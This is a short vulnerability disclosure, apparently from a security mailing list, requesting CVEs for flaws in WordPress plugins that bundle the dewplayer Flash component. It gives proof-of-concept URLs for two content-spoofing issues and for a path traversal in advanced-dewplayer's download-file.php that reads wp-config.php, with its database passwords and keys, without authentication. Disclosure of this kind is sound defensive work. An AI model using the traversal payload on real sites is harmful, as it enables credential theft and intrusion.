While verifying (lunch break) dewplayer issues announced here
http://seclists.org/fulldisclosure/2013/Dec/209 I noticed that there is same
component also used with other plugins. Please notify me in case this list does
not care about WordPress plugin security overall as it can make our list less
readable. Only listing active (non-disabled) plugins.
Q: Does content spoofing issues normally get CVE as the risk is probably
minimal?
Assigning one CVE for vulnerability in different software components e.g.
libraries used in WordPress plugins makes it very difficult to coordinate
updates with end-users. Examples:
http://osvdb.org/83413
http://osvdb.org/90374
I hope to get new CVEs for these issues below.
#1
Plugin: flash-player-widget
Version tested: 1.3
Type: CAPEC-148: Content Spoofing
PoC: http://example.com/wp-content/plugins/flash-player-widget/dewplayer.swf?mp3=http://example.mp3
SHA1: 97a4b45212be83bf8dc5dd7a289a3decac7889ab
Notes:
- No XSS vector by using ?xml=xss.xml
- No full path disclosure
#2
Plugin: advanced-dewplayer
Version tested: 1.2
Type: CAPEC-148: Content Spoofing
PoC: http://example.com/wp-content/plugins/advanced-dewplayer/dewplayer.swf?mp3=http://example.mp3
SHA1: 2947cc06ab1bd6e8af2229511e6797f9709ca615 (same as
dewplayer-flash-mp3-player in the announcement)
Notes:
- No XSS vector by using ?xml=xss.xml
- No full path disclosure
Also at the process I noticed that there is additional security vulnerability.
Details below.
#3
Plugin: advanced-dewplayer
Version tested: 1.2
Type: Information Disclosure / CAPEC-118: Data Leakage Attacks
PoC:
http://example.com/wp-content/plugins/advanced-dewplayer/admin-panel/download-file.php?dew_file=../../../../wp-config.php
Impact: File wp-config.php contains database passwords, authentication
keys/salts etc. Does not need authentication.
General note: No time to make proper analysis so there is probably more issues :)